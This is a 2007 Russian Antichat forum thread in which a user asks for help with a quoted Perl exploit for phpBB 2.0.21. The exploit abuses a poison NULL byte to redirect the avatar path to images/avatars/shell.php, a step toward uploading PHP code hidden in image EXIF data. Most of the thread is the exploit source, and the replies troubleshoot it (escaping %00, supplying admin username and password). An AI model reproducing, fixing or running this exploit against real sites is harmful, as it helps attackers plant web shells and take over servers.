HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
Перезагрузить страницу Траблы со сплоитом для phpBB 2.0.21
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Траблы со сплоитом для phpBB 2.0.21
  #1  
Старый 24.05.2007, 08:04
Юличка
Новичок
Регистрация: 13.06.2004
Сообщений: 9
Провел на форуме:
72795

Репутация: 1
По умолчанию Траблы со сплоитом для phpBB 2.0.21
Народ у меня на локалке форум phpBB 2.0.21 стоит путь http://server/index.php

узаю этот сплоит

Цитата:
#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#

use HTTP::Cookies;
use LWP;
use URI::Escape;
unless(@ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());

$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);

$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);

$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_p ath=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}

# milw0rm.com [2006-09-11]
пишу в ком.строке
c:\PERL\bin\perl.exe c:\phpbb.pl http://server/ 44c59e4934c79044faa953ad91bf7f45 images/avatars/shell.php

а мне в ответ это пишет:
Use of uninitialized value in concatenation (.) or string at c:\phpbb.pl line 52
.
Use of uninitialized value in concatenation (.) or string at c:\phpbb.pl line 53
.

что не то помогите плз!
 

  #2  
Старый 24.05.2007, 08:53
Gh0s7
Участник форума
Регистрация: 23.11.2006
Сообщений: 226
Провел на форуме:
1045663

Репутация: 864
По умолчанию
Однако. Это бага специально видимо =\

Код:
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
В первой строке скорее всего должен быть sid.
Во второй %00 интерпретируется как хэш, меняй на "\%00" или '%00'.
Как автор выдергивает сид я хз, мб в пхпбб бордах это хэш пасса, тогда $ARGV[1], если нет, то хз =\
Влом чекать.
 

  #3  
Старый 28.05.2007, 21:40
ShAnKaR
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474

Репутация: 1424


По умолчанию
на писано ж:
Цитата:
./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php
это переводится как юзай admin pass а не хеш , Юличка
 
Закрытая тема



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ошибки Windows 2 SVipeR Windows 9 02.03.2009 19:28
Jimm FAQ KPOT_f!nd Skype, IRC, ICQ, Jabber и другие IM 2 15.04.2007 14:48
Траблы со сплоитом для phpBB 2.0.13 zzipper Уязвимости CMS / форумов 5 02.02.2006 15:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.